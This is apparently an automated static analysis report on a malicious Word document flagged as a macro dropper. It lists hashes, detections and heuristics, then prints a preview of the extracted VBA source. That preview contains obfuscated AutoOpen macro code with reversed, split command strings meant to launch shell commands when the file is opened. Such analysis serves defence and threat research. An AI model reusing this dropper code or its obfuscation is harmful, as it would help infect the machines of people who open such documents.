Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0304f27194765db2…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 171.5 KB
Created: 2018-05-15 20:58:00
Authoring application: Microsoft Office Word
First seen: 2019-06-27
MD5: 2e4a6a6a92c642938b9d9c77de822314
SHA-1: 196f7b64a6a4098c4a59489bfec591317c21c4eb
SHA-256: 0304f27194765db21cc3786ed4c635dccc4bbd92047b02ac2b3bc200e7dea2e8
Risk Score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The sample is a malicious OLE document containing a VBA macro. The macro defines an AutoOpen subroutine, which Word runs automatically when the document is opened, and triggers a critical heuristic for a Shell() call, indicating it is designed to execute arbitrary commands. This combination is commonly used to download and execute further malicious payloads.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6545729-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6545729-0
  • VBA macros detected [medium] (OLE_VBA_MACROS; 2 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 146118 bytes
SHA-256: 37c705f4f83ae40e2fecdb6fb3fdd83c0aad662a7f3fdb3eaac037ab7b91d050

Preview: first 1,000 lines of the extracted script (output truncated below)
Attribute VB_Name = "IbbPPaQajtorB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub RFwDnl(iBvCmV)
wKKFzw = Wrrla
siQQSd = Kcmaw + CDbl(35320 - XHVEGf - UDzwz + CDbl(27869)) - 16094 - CDbl(89526)
FRNvE = kikIC
VYkHfE = 88316
End Sub
Sub Wmfud(bQRUO)
QOhIk = nUWqU
dawfPr = JOfrS + CDbl(73741 - SjbUM - uqXGq + CDbl(53410)) - 42960 - CDbl(15770)
ZsfRi = DZvBa
EzkXO = 42932
EGtCi = DmDso
VKspnL = EBPHf + CDbl(37122 - Nptmib - EDKfp + CDbl(2113)) - 24669 - CDbl(59972)
zjGNEr = HzLOS
pzNjr = 83759
sQJNh = GhJzK
YWPaYF = VcmoXN + CDbl(75497 - NLSGJV - ljXtf + CDbl(77154)) - 70898 - CDbl(60269)
ABatta = odKVl
cmAuc = 87203
End Sub
Sub qqBSH(jCfZtk)
nnWmuu = nidwzj
GltlLr = HKzHl + CDbl(17079 - VJDRkn - oQNAi + CDbl(12285)) - 65737 - CDbl(24174)
CTbFZ = mohtn
dWiIls = 34113
ZhOsM = Ufkcl
uzwoKD = DWPjr + CDbl(565 - LtiswN - rnUEi + CDbl(86919)) - 14371 - CDbl(93755)
EEILl = ZqziXN
KwWsZG = 52639
End Sub
Sub Autoopen()
On Error Resume Next
rjXLDK = kcKNHQ
ijoBf = suOqC + CDbl(86895 - WhpTAV - MYkAh + CDbl(40684)) - 96015 - CDbl(11350)
YJGiz = nDYbH
wRjIK = 64821
irvLtcKpPFUon (CmqMl + vmBPTlpThWqUG + wFwnT)
VmZqj = LdBumv
NFPHE = XnsDih + CDbl(94519 - bBPpP - QlRXb + CDbl(438)) - 25067 - CDbl(98408)
EIAvn = Biwuw
XdjrJj = 50951
End Sub
Sub bmEWqJ(nsjEiY)
ovilKz = SRvTJt
ijRQm = dRDiF + CDbl(57140 - NqSqRX - poIXZd + CDbl(18083)) - 17106 - CDbl(40444)
ChPUF = OnsIF
rEjjB = 24547
zEClFS = XurJGU
tbYNbI = DCYOiT + CDbl(93599 - rsbwj - EzvKB + CDbl(22008)) - 78594 - CDbl(37699)
iClZwc = SaEwv
dWWwz = 37544
whJna = bdCZwo
HqLwuw = jaBrha + CDbl(5777 - YoCOV - wBtzw + CDbl(18345)) - 1353 - CDbl(59191)
AIJKu = KZEwsU
jRGAl = 11236
End Sub
Sub OXiTU(oSzvp)
EKBjXP = iNOzP
vYUbrw = uaBcZ + CDbl(81426 - kwsaIJ - POihi + CDbl(69620)) - 56081 - CDbl(44672)
zZTqYm = rHzRf
JYKhZY = 69213
End Sub

Attribute VB_Name = "opFLjKqtJN"
Sub XjBDGz(ziBSK)
llEGXB = EnVLk
ircdz = kWIuHV + CDbl(7128 - HaFUVi - ZuFkW + CDbl(15357)) - 5869 - CDbl(80749)
OpTtVa = AEUaW
qwlTTD = 58164
End Sub
Function vmBPTlpThWqUG()
On Error Resume Next
AqGAEz = taqjj
jSBKM = FEQADq + CDbl(93028 - IwCoz - CNzNs + CDbl(31769)) - 56385 - CDbl(96825)
ditqF = ijJHX
dkpCJ = 16131
JNkzfw = XFdRkd
fTXLbk = PlXGIN + CDbl(50859 - ZZhzs - ErAAua + CDbl(38504)) - 84088 - CDbl(23735)
hPwfM = WrONtb
qXkQM = 60459
uCQWofFs = Ipffs("zi.)63]rAHC[]gNiRTs[,)78]rAHC[+611]rAHC[+37]rAHC[((ECAlpEr.)'`','puE'(.rBDMt", 14764 + 7 - 14764, 14764 + 68 - 14764)
kmlvb = WKhJPY
SYtQv = zDqjiA + CDbl(54554 - KdJKHM - UvdBD + CDbl(69327)) - 7400 - CDbl(23139)
FzVCu = dUUOj
tDGvz = 97633
iNtvwM = zofVX
DwadcZ = UwpWj + CDbl(93749 - Biwkd - uAvVk + CDbl(18603)) - 20164 - CDbl(33059)
UIHjPq = QqLMA
mXWOC = 85372
vcCXA = Ipffs("bEUTc[]gNirTS[,)09]RAhc'+'[+211]RAhc[+76]RAhc[((ECALpEr.)Av2}}{hAv2+Av2cAv2+'+'Av'+'2tacAv2+Av2};kaeAv2+Av2rb;)CDSLkAv2+Av2K()Av2+Av2ZpA'+'v'+'2+Av2CmAv2+Av2eAv2+Av2tI-eZpC+ZpAv2+Av2Ck'+'Av2+Av'Xco", 24234 + 4 - 24234, 24234 + 190 - 24234)
PrurH = CDEtT
mYbjP = hddRFY + CDbl(34538 - cOXzV - SzjcO + CDbl(30932)) - 49665 - CDbl(24810)
VLzswN = KrGOUO
zmVZra = 78232
isHlRm = iqNDms
OrtIHF = uDwwzS + CDbl(64555 - tuqiP - srbwm + CDbl(28841)) - 93266 - CDbl(35691)
WWzoca = arQbk
ImUTzP = 93316
OvWNtoMGU = Ipffs("oSkfOAv2+Av2eAv2+Av2lXCtIFAv2+Av2daOAv'+'2+Av2XCtAv2+Av2lnWXCtoDZfOAv2+Av2.UAv2+Av2YYLAv2+Av'+'2kK{yAv2+Av2rtAvijME", 60485 + 5 - 60485, 60485 + 108 - 60485)
MEdfV = SKVqDb
ccwiE = oUzRod + CDbl(6474 - oiSRjW - KSWIHa + CDbl(74547)) - 30565 - CDbl(42309)
XJjjKW = sbHwNm
CSQdfC = 47580
NJdrHj = jJWtv
MuBjM = tVzCnK + CDbl(26111 - aFJSZ - UJPVaj + CDbl(38597)) - 16773 - CDbl(90886)
uOHiHP = fDZuJO
qjuJl = 57653
irorj = Ipffs("iZzcoAv2+Av2-wZpC+ZpAv2+Av2CeZpC+ZpAv2+Av2CnZAv2+Av2pCAv2'+'+Av2(& Av2+Av2=Av2+Av2 dsAv2+Av2adaAv2+Av2snLAv2+Av2kKAv2(( 6h%", 43401 + 4 - 43401, 43401 + 116 -
... (truncated)